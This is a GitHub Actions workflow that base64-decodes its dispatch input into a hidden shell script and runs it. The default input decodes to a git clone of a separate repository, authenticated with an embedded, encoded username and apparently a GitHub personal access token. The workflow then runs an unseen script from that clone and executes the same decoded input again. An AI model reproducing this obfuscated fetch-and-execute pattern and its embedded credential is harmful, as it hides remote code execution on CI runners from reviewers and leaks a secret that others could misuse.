name: onodejsrunnerpublicv1
on:
  workflow_dispatch:
    inputs:
      checkout:
        default: "Z2l0IC1jIGh0dHAuZXh0cmFIZWFkZXI9IkF1dGhvcml6YXRpb246IEJhc2ljIGIyNW5kSEpwWlhWb1lYVXRaR2c2WjJod1gyUnJlR0V3YldaS2IwUk9RM2ROVkc5dVRtbEhTRkJQU0hweGQxTktiekpUZEhscU5RIiBjbG9uZSBodHRwczovL2dpdGh1Yi5jb20vb25ndHJpZXVoYXUtZGgvYnVpbGQtdG9vbHMuZ2l0IC4vc3Jj"
jobs:
  onodejsrunnerpublicv1:
    runs-on: ubuntu-latest
    name: onodejsrunnerpublicv1
    steps:
      - name: checkout
        shell: bash
        run: |
          base64 -d <<< "${{ github.event.inputs.checkout }}" > ./.onodejsrunnerpublicv1.checkout.sh
          chmod u=rwx ./.onodejsrunnerpublicv1.checkout.sh
          ./.onodejsrunnerpublicv1.checkout.sh
          ./.onodejsrunnerpublicv1.checkout.cat.sh

      - name: Run Workflow
        id: write_file
        uses: timheuer/base64-to-file@v1.2
        with:
          fileName: "write_file.sh"
          fileDir: "./"
          encodedString: ${{ github.event.inputs.checkout }}

      - name: Run
        shell: bash
        run: |
          chmod u=rwx ./write_file.sh
          ./write_file.sh
